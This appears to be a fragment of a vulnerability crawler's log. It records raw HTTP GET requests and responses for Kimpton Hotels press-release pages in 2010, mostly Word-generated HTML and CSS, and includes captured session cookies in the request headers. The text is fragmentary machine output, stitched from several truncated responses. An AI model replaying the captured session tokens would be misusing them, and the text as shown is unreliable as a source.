mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:28848037; mso-list-type:hybrid; mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l3 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l3:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l5 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:1707218260; mso-list-type:hybrid; mso-list-template-ids:1001260830 1676557052 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l6:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p&..
- /pdfs/press/html/Rub-0110/index.html

/pdfs/press/html/Rub-0110/index.html

http://www.kimptonhotels.com/pdfs/press/html/Rub-0110/index.html

Request

GET /pdfs/press/html/Rub-0110/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29277
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>1</o:TotalTime>
<o:LastPrinted>2010-01-27T23:04:00Z</o:LastPrinted>
<o:Created>2010-01-27T23:04:00Z</o:Created>
<o:LastSaved>2010-01-27T23:04:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>625</o:Words>
<o:Characters>3564</o:Characters>
<o:Lines>29</o:Lines>
<o:Paragraphs>7</o:Paragraphs>
<o:CharactersWithSpaces>4376</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:77;
mso-generic-font-family:modern;
mso-font-format:other;
mso-font-pitch:fixed;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:77;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:533346185;
mso-list-type:hybrid;
mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}
@list l3:level1
{mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Symbol;}
@list l4:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l5
{mso-list-id:1566069662;
mso-list-type:hybrid;
mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l6
{mso-list-id:1636525908;
mso-list-type:hybrid;
mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7
{mso-list-id:1765494741;
mso-list-type:hybrid;
mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-hansi-font-family:Calibri;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"..
- /pdfs/press/html/Spark-1209/index.html

/pdfs/press/html/Spark-1209/index.html

http://www.kimptonhotels.com/pdfs/press/html/Spark-1209/index.html

Request

GET /pdfs/press/html/Spark-1209/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 33222
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2009-12-08T19:03:00Z</o:LastPrinted> <o:Created>2010-01-04T21:55:00Z</o:Created> <o:LastSaved>2010-01-04T21:55:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>755</o:Words> <o:Characters>4309</o:Characters> <o:Lines>35</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5291</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> 